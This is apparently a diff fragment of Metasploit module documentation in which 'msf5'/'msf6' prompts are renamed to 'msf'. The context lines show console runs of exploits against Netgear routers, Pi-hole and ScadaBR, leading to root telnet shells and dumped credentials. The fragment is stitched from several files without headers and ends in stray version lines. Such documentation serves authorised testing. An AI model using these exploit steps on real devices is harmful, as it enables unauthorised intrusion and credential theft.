-        msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
-        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options
+        msf > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
+        msf auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options

        Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):

@@ -68,13 +68,13 @@ This vulnerability was discovered and exploited by an independent security resea
        SSL      false            no        Negotiate SSL/TLS for outgoing connections
        VHOST                     no        HTTP server virtual host

-        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > set RHOSTS 192.168.1.1
+        msf auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > set RHOSTS 192.168.1.1
        RHOSTS => 192.168.1.1
-        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > check
+        msf auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > check

        [*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
        [*] 192.168.1.1:80 - The target appears to be vulnerable.
-        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > exploit
+        msf auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > exploit
        [*] Running module against 192.168.1.1

        [*] Running automatic check ("set AutoCheck false" to disable)
@@ -92,7 +92,7 @@ This vulnerability was discovered and exploited by an independent security resea
        [*] Attempting to log in with admin:theRiverOfNope123!. You should get a new telnet session as the root user
        [*] Command shell session 1 opened (192.168.224.128:45717 -> 192.168.1.1:23) at 2021-09-23 16:38:53 -0500
        [*] Auxiliary module execution completed
-        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > sessions -i 1
+        msf auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > sessions -i 1
        [*] Starting interaction with 1...


@@ -54,8 +54,8 @@ upnpd port on the target. Default 5000.
 ### Netgear R6700v3 firmware version V1.0.4.84_10.0.58

 ```
-    msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
+    msf > use auxiliary/admin/http/netgear_r6700_pass_reset
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) > show options
    
    Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
    
@@ -67,13 +67,13 @@ upnpd port on the target. Default 5000.
       SSL      false            no        Negotiate SSL/TLS for outgoing connections
       VHOST                     no        HTTP server virtual host
    
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
    RHOSTS => 192.168.1.1
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) > check
    
    [*] Target is running firmware version 1.0.4.84
    [*] 192.168.1.1:5000 - The target appears to be vulnerable.
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
    [*] Running module against 192.168.1.1
    
    [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
@@ -93,24 +93,24 @@ upnpd port on the target. Default 5000.
    [*]     2.7- run it and login with 'admin:<WHATEVER>'
    [*] 3- Enjoy your root shell!
    [*] Auxiliary module execution completed
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) >
 ```

 Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
 session running as `root`, entered the following commands:

 ```
-    msf5 > use exploit/linux/telnet/netgear_telnetenable
+    msf > use exploit/linux/telnet/netgear_telnetenable
    [*] No payload configured, defaulting to cmd/unix/interact
-    msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
+    msf exploit(linux/telnet/netgear_telnetenable) > set username admin
    username => admin
-    msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
+    msf exploit(linux/telnet/netgear_telnetenable) > set password testing123
    password => testing123
-    msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
+    msf exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
    MAC => D56C89FC94C9
-    msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1
+    msf exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1
    RHOSTS => 192.168.1.1
-    msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
+    msf exploit(linux/telnet/netgear_telnetenable) > exploit
    
    [+] 192.168.1.1:23 - Detected telnetenabled on UDP
    [+] 192.168.1.1:23 - Using creds admin:testing123
@@ -147,8 +147,8 @@ session running as `root`, entered the following commands:
 ### Netgear R6700v3 firmware version V1.0.0.4.82_10.0.57

 ```
-    msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
+    msf > use auxiliary/admin/http/netgear_r6700_pass_reset
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) > show options
    
    Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
    
@@ -160,13 +160,13 @@ session running as `root`, entered the following commands:
       SSL      false            no        Negotiate SSL/TLS for outgoing connections
       VHOST                     no        HTTP server virtual host
    
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
    RHOSTS => 192.168.1.1
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) > check
    
    [*] Target is running firmware version 1.0.4.82
    [*] 192.168.1.1:5000 - The target appears to be vulnerable.
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
    [*] Running module against 192.168.1.1
    
    [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.
@@ -186,16 +186,16 @@ session running as `root`, entered the following commands:
    [*]     2.7- run it and login with 'admin:<WHATEVER>'
    [*] 3- Enjoy your root shell!
    [*] Auxiliary module execution completed
-    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
+    msf auxiliary(admin/http/netgear_r6700_pass_reset) >
 ```

 Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
 session running as `root`, entered the following commands:

 ```
-    msf5 > use exploit/linux/telnet/netgear_telnetenable
+    msf > use exploit/linux/telnet/netgear_telnetenable
    [*] No payload configured, defaulting to cmd/unix/interact
-    msf5 exploit(linux/telnet/netgear_telnetenable) > show options
+    msf exploit(linux/telnet/netgear_telnetenable) > show options
    
    Module options (exploit/linux/telnet/netgear_telnetenable):
    
@@ -226,15 +226,15 @@ session running as `root`, entered the following commands:
       0   Automatic (detect TCP or UDP)
    
    
-    msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1
+    msf exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1
    RHOST => 192.168.1.1
-    set msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
+    set msf exploit(linux/telnet/netgear_telnetenable) > set username admin
    username => admin
-    msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
+    msf exploit(linux/telnet/netgear_telnetenable) > set password testing123
    password => testing123
-    msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
+    msf exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
    MAC => D56C89FC94C9
-    msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
+    msf exploit(linux/telnet/netgear_telnetenable) > exploit
    
    [+] 192.168.1.1:23 - Detected telnetenabled on UDP
    [+] 192.168.1.1:23 - Using creds admin:testing123
@@ -30,10 +30,10 @@ Netgear R7000 routers running firmware version `1.0.11.116` and earlier.

 ### Netgear R7000 with Firmware Version 1.0.11.116
 ```
-msf6 > use auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
-msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > set RHOSTS 192.168.1.1
+msf > use auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
+msf auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > set RHOSTS 192.168.1.1
 RHOSTS => 192.168.1.1
-msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > show options
+msf auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > show options

 Module options (auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce):

@@ -45,7 +45,7 @@ Module options (auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

-msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > run
+msf auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > run
 [*] Running module against 192.168.1.1

 [*] Executing automatic check (disable AutoCheck to override)
@@ -54,7 +54,7 @@ msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > run
 [*] Sending 10th and final packet...
 [*] If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet 192.168.1.1
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) >
+msf auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) >
 ```

 And in a separate terminal shell:
@@ -73,9 +73,9 @@ resource (pihole.rb)> run
 [*] Forcing gravity pull
 [+] /var/www/html/admin/scripts/pi-hole/php
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/pihole_domains_api_exec) > set command whoami
+msf auxiliary(admin/http/pihole_domains_api_exec) > set command whoami
 command => whoami
-msf6 auxiliary(admin/http/pihole_domains_api_exec) > run
+msf auxiliary(admin/http/pihole_domains_api_exec) > run
 [*] Running module against 192.168.2.199

 [+] Web Interface Version Detected: 5.3.1
@@ -48,14 +48,14 @@ Wordlist file to crack password hashes (default: `./data/unix_passwords.txt`)
 ## Scenarios

 ```
-msf6 > use auxiliary/admin/http/scadabr_credential_dump 
-msf6 auxiliary(admin/http/scadabr_credential_dump) > set rhosts 172.16.191.194
+msf > use auxiliary/admin/http/scadabr_credential_dump 
+msf auxiliary(admin/http/scadabr_credential_dump) > set rhosts 172.16.191.194
 rhosts => 172.16.191.194
-msf6 auxiliary(admin/http/scadabr_credential_dump) > set username admin
+msf auxiliary(admin/http/scadabr_credential_dump) > set username admin
 username => admin
-msf6 auxiliary(admin/http/scadabr_credential_dump) > set password admin
+msf auxiliary(admin/http/scadabr_credential_dump) > set password admin
 password => admin
-msf6 auxiliary(admin/http/scadabr_credential_dump) > run
+msf auxiliary(admin/http/scadabr_credential_dump) > run
 [*] Running module against 172.16.191.194

 [+] 172.16.191.194:8080 Authenticated successfully as 'admin'
@@ -91,7 +91,7 @@ ScadaBR Service Credentials
 SMTP        127.0.0.1  25    smtptestuser   smtptestpass

 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/scadabr_credential_dump) > creds
+msf auxiliary(admin/http/scadabr_credential_dump) > creds
 Credentials
 ===========

@@ -103,6 +103,6 @@ host            origin          service          public    private   realm  priv
 172.16.191.194  172.16.191.194  8080/tcp (http)  user      A                Password
 172.16.191.194  172.16.191.194  8080/tcp (http)  zxcv      zxcv             Password

-msf6 auxiliary(admin/http/scadabr_credential_dump) > 
+msf auxiliary(admin/http/scadabr_credential_dump) > 
 ```

--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .2.8
 .3.8
@@ -1 +1 @@
 .2.5
 .3.8